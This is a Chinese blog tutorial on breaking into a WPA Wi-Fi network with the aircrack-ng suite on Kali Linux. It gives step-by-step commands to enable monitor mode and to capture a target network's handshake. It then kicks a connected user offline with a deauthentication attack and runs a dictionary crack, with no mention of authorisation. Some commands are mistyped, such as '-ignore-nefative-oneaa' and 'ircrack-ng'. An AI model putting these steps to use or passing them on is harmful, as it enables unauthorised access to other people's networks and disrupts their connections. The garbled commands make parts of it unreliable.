编辑
2023-07-27
Linux学习
00
请注意,本文编写于 419 天前,最后修改于 419 天前,其中某些信息可能已经过时。

目录

正式开始
查看已安装网卡
开启网卡监控
扫描wifi
等待抓取握手包
爆破 抓取握手包
抓取成功
开始破解

正式开始

查看已安装网卡

以下的操作都需要提升权限,默认的root密码都是kali

javascript
#提升权限 sudo su

复制

javascript
#查看网卡 airmon-ng

复制

在这里插入图片描述

如果没有,请注意是否开启了网卡在虚拟机的连接,如下图

在这里插入图片描述

打开一个终端窗口

开启网卡监控

javascript
#开启网卡监控 airmon-ng start wlan0

复制

在这里插入图片描述

可以使用命令看看网卡的名字是否改变

javascript
ifconfig

复制

在这里插入图片描述

可以看到最后的那个名字已经改变

扫描wifi

javascript
airodump-ng wlan0mon

复制

我们选择这个名叫adcd的wifi进行破解

在这里插入图片描述

等待抓取握手包

上述方法后,按ctrl+c,退出扫描

输入命令

javascript
airodump-ng -w freedom -c 11 --bssid 9C:2E:A1:20:65:BC wlan0mon -ignore-nefative-oneaa

复制

-c:指定信道 -w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字 –bssid:指定路由器的MAC

需要更改两个参数,信道和地址,这两个参数分别是扫描wifi时确定要破解的wifi参数

在这里插入图片描述

在这里插入图片描述

回车后,如下界面

在这里插入图片描述

从这个界面可以看出,选定的wifi一共有一个人连接,没有人连接的wifi是无法破解的

爆破 抓取握手包

这个步骤,说白了,就是将一个用户踢下线,让他重新连接WIFI,这样我们就能监听并且截取到握手包

重启一个终端窗口,一样的,申请管理员权限,密码默认:kali

javascript
sudo su

复制

执行如下命令,同样的,需要输入上一步的两个参数,一个客户机的MAC,和路由器的MAC

javascript
aireplay-ng -0 2 -a 9C:2E:A1:20:65:BC -c A4:50:46:D8:74:29 wlan0mon

复制

-a:指定路由器的MAC -c:指定客户机的MAC

在这里插入图片描述

执行成功后如上图,表明该客户机以及被成功的踢下线,我们要做的就是等待客户机重新连接,他只要重新连接了,我们就能抓到握手包,进行跑字典破解

抓取成功

当第四步的终端窗口出现如下

在这里插入图片描述

表明成功抓取到握手包,进行下一个步骤 注意!!这里抓到包一定要按ctrl+c退出抓包,不然抓到的握手包用不了哦

开始破解

包在**/home/kali/**文件夹下,找到名叫freedom-01.ivs文件,这个就是抓到的包

在这里插入图片描述

然后就是字典,我个人建议将字典一同放在该目录下

在这里插入图片描述

然后再次重起一个终端窗口,输入如下命令

javascript
ircrack-ng -w pass.txt freedom-*.ivs

复制

在这里插入图片描述

回车开始解密

请添加图片描述

能否成功看字典的是否强大,也看脸

成功界面

请添加图片描述

失败界面

在这里插入图片描述

如果对你有用的话,可以打赏哦
打赏
ali pay
wechat pay

本文作者:Gustav

本文链接:

版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!